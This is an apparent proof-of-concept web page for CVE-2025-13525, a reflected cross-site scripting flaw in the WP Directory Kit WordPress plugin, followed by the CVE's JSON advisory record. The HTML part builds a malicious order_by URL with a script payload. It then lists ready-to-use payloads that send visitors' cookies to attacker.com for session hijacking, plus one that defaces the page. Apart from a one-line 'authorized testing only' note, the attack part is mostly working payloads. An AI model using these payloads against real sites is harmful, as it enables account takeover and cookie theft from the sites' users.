CVE-2025-13525

<!-- CVE-2025-13525 PoC - Reflected XSS via order_by parameter --> <!-- Target: WordPress site with WP Directory Kit plugin <= 1.4.5 --> <!-- This PoC demonstrates the XSS vulnerability in the order_by parameter --> <!DOCTYPE html> <html> <head> <title>CVE-2025-13525 PoC</title> </head> <body> <h2>CVE-2025-13525 - WP Directory Kit Reflected XSS</h2> <!-- Malicious URL that triggers the XSS --> <p>Malicious URL:</p> <code id="malicious-url"></code> <script> // Generate malicious URL targeting order_by parameter var targetUrl = window.location.origin + '/?'; var xssPayload = '<script>alert("XSS - CVE-2025-13525");<\/script>'; var maliciousUrl = targetUrl + 'order_by=' + encodeURIComponent(xssPayload); document.getElementById('malicious-url').textContent = maliciousUrl; // Display the constructed payload console.log('XSS Payload:', xssPayload); console.log('Full URL:', maliciousUrl); </script> <!-- Example attack scenarios --> <h3>Attack Scenarios:</h3> <ol> <li><strong>Cookie Theft:</strong> <code>order_by="><script>document.location='https://attacker.com/steal?c='+document.cookie</script></code></li> <li><strong>Session Hijacking:</strong> <code>order_by="><script>fetch('https://attacker.com/log?data='+btoa(document.cookie))</script></code></li> <li><strong>Page Defacement:</strong> <code>order_by="><script>document.body.innerHTML='<h1>Hacked</h1>'</script></code></li> </ol> <p><strong>Note:</strong> This is for authorized security testing only.</p> </body> </html>

{"cve": {"id": "CVE-2025-13525", "sourceIdentifier": "[email protected]", "published": "2025-11-27T06:15:46.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Directory Kit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'order_by' parameter in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.4/application/views/wdk_messages/index.php#L38", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.4/application/views/wdk_messages/index.php#L39", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3401078%40wpdirectorykit&new=3401078%40wpdirectorykit&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/wpdirectorykit/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/01cd3631-93fb-4016-baa4-8ea11b21acec?source=cve", "source": "[email protected]"}]}}